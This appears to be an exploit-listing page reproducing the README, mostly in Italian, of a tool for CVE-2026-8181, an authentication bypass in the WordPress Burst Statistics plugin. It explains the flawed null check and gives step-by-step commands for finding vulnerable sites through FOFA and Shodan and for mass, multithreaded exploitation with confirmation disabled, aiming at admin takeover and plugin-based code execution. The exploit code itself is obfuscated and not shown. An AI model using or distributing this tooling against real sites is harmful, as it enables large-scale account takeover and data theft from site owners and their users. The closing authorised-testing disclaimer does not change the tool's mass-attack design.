Sploitus

Exploit for CVE-2026-8181

kitploit · 2026-08-28

Exploit Code

MARKDOWN152 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-HUDZAIFAHARRANTISI-CVE-2026-8181
# CVE-2026-8181 - Burst Statistics Authentication Bypass

**CVSS 9.8 (Critical)** — Authentication Bypass to Admin Account Takeover

## Descrizione

CVE-2026-8181 è una vulnerabilità di **Bypass di Autenticazione** nel plugin WordPress **Burst Statistics** versione **3.4.0 fino a 3.4.1.1**. Questo plugin è utilizzato da **200.000+ siti WordPress** come alternativa privacy-friendly a Google Analytics per le analisi.

Questa vulnerabilità consente a un **attaccante senza autenticazione** che conosce il **nome utente admin** di:

  * Ottenere la **Application Password** admin in 1 richiesta HTTP
  * Eseguire una **Acquisizione Completa dell'Account Amministratore**
  * Creare un nuovo account admin
  * Accedere a tutti i dati del sito (inclusi WooCommerce, dati utente, ecc.)
  * Installare plugin dannosi / RCE



### Causa Tecnica

La funzione `is_mainwp_authenticated()` in `class-mainwp-proxy.php` sbaglia nella validazione del valore di ritorno di `wp_authenticate_application_password()`. Questa funzione restituisce `null` (non `WP_Error`) quando viene chiamata al di fuori del contesto REST API, e il codice controlla solo `is_wp_error()`. Poiché `null` non è un `WP_Error`, l'autenticazione viene considerata riuscita.

## Caratteristiche dello Strumento

  * **GUI Moderna** — Tema scuro, layout compatto, 3 schede (Scan, Exploit, Log)
  * **Scanner di Massa** — Cerca target tramite FOFA API, Shodan API o file list
  * **Exploit Automatico** — Exploit di massa con multi-threading
  * **Modalità CLI** — Può funzionare senza GUI per automazione



## Requisiti

  * **Python 3.11** (obbligatorio — i file .pyd sono compilati per Python 3.11)
  * Windows 10/11



## Installazione e Utilizzo

root@kitploit:~
    
    
    # 1. Clone repository
    git clone https://github.com/YOUR_USERNAME/CVE-2026-8181.git
    cd CVE-2026-8181
    
    # 2. Install dependencies
    py -3.11 -m pip install -r requirements.txt
    
    # 3. Siapkan .env (untuk scan via FOFA / Shodan)
    echo some-email@example.com > .env
    echo FOFA_KEY=your_fofa_key >> .env
    echo SHODAN_KEY=your_shodan_key >> .env
    
    # 4. Jalankan (pilih salah satu):
    
    #    Modern GUI (recommended)
    py -3.11 gui_modern.py
    
    #    Atau double-click run.bat
    run.bat
    
    #    Atau CLI langsung exploit satu target
    py -3.11 CVE-2026-8181.py -t https://target.com -u admin --no-confirm
    
    #    Atau exploit massal dari file
    py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
    
    #    Atau scan target dulu, baru exploit
    py -3.11 finder.py --file list.txt
    py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
    

## Tutorial Passo dopo Passo

### Passo 1: Avvia lo Strumento

Fai doppio clic su `run.bat` o esegui:

root@kitploit:~
    
    
    py -3.11 gui_modern.py
    

![Strumenti GUI Moderna](https://assets.kitploit.com/production/public/readmes/36639/b814dd6f11ef7006aeec01e6f64788d645cc5421c0b1632c71656bf7017b1c5d.png)

_Vista della GUI moderna di CVE-2026-8181 con 3 schede_

### Passo 2: Scansiona Target e Exploit

Nella scheda **Scan** : scegli la fonte del target (FOFA/Shodan da .env, file o manuale) → clicca su **SCAN TARGETS**. Nella scheda **Exploit** : inserisci il nome utente admin → clicca su **EXPLOIT**

![Risultato Scansione CVE](https://assets.kitploit.com/production/public/readmes/36639/ee5a2b48847e68eb2da2c0f0071ae6b631fd0520ba5c3c39d8461bf73e125d2b.png)

_Lo strumento trova target vulnerabili e pronti per l'exploit_

### Passo 3: Accesso all'Admin WordPress

Se l'exploit ha successo, l'attaccante ottiene accesso completo come amministratore:

![Dashboard Admin WordPress](https://assets.kitploit.com/production/public/readmes/36639/c23a6414dbd6642c48c42df2b46afa230673faec618027b4ce28cd88f4a8032b.png)

_Dashboard amministratore WordPress dopo un exploitation riuscito_

## File Structure

root@kitploit:~
    
    
    CVE-2026-8181/
    ├── CVE-2026-8181.py          # Main exploit engine (PyArmor)
    ├── gui_modern.py             # Modern GUI wrapper (recommended)
    ├── finder.py                 # Target scanner (FOFA / Shodan / File)
    ├── run.bat                   # One-click launcher
    ├── requirements.txt          # Python dependencies
    ├── .env                      # API keys (gitignored)
    ├── .gitignore
    ├── Dork.txt                  # Google Dork
    ├── pyarmor_runtime_000000/   # PyArmor runtime (Python 3.11)
    ├── system/                   # Source modules (obfuscated)
    └── img/                      # Screenshots tutorial
        ├── 1.png
        ├── 2.png
        └── 3.png
    

## Come Ottenere la Chiave API

### FOFA (fofa.info)

  1. Registrati su https://fofa.info
  2. Accedi → https://fofa.info/userInfo
  3. Copia Email e Chiave API → inseriscile in `.env`



### Shodan (shodan.io)

  1. Registrati su https://account.shodan.io/register
  2. Accedi → https://account.shodan.io
  3. Copia Chiave API → inseriscila in `.env`



## Opzioni CLI (CVE-2026-8181.py)

## Disclaimer

**Solo per scopi educativi e penetration testing autorizzato.** L'uso senza autorizzazione su sistemi che non sono di tua proprietà è illegale. Utilizza solo su siti che possiedi o per i quali hai autorizzazione scritta.